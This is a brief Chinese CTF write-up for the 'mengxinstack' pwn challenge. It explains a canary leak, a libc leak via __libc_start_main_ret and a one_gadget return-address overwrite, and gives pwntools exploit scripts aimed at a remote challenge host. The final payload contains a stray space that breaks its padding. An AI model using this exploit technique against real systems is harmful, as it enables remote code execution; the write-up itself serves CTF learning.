记录一下36D的mengxinstack题目
下载题目,checksec下分析,开启了很多保护,有canary,64位,IDA分析,知道这个程序先执行了一次read,再把read进去的东西print出来,再read,两次read都会造成栈溢出
观察到程序在运行时候(上图)的栈中有__libc_start_main+235的地址,这个地址其实是__libc_start_main的返回地址即__libc_start_main_ret,在查询libc版本的网站里可以找到对应的libc版本
from pwn import *
io = remote("124.156.121.112",28011)
io.recv()
io.send('a'*0x48)
io.recv()
这时候可以接收到__libc_start_main_ret的地址,再去那个网站查询即可,知道了是libc6_2.23-0ubuntu10_amd64,这个版本的__libc_start_main与其ret相距240个字节
然后第一次read泄露出canary,这里可以覆盖掉canary的最后一个字节(canary的最后一字节总是'\x00',目的是为了截断print等函数对字符串的输出),然后得到了print输出了canary,接下来需要使得程序重新执行main,怎么做呢?可以参考TaQini师傅的博客,现在知道了libc版本,又知道了canary,就可以直接one_gadget了
from pwn import *
from LibcSearcher import *
io = remote('124.156.121.112',28011)
#io=process('./pwn4')
elf = ELF('./mengxinstack')
context.log_level = 'debug'
payload = 'A'*0x29
io.send(payload)
io.recvuntil('A'*0x28)
canary = u64(io.recv(8))-0x41
payload = 'a'*0x28 + p64(canary) + 'a'*0x18 + '\x04'
#gdb.attach(io)
io.send(payload)
payload = 'a'*0x28 + 'a'*0x8 + 'a'*0x18
io.send(payload)
io.recvuntil('a'*0x48)
libc_start_main = u64(io.recv(6).ljust(8,'\x00'))-240
libc = LibcSearcher('__libc_start_main',libc_start_main )
libc_base = libc_start_main - libc.dump('__libc_start_main')
#0x45216 one_gadget libc6_2.23-0ubuntu10_amd64.so
one_gedget = libc_base+0x45216
payload = 'a'*0x28 + p64(canary) + ' a'*0x18 + p64(one_gedget)
io.send(payload)
#gdb.attach(io)
io.interactive()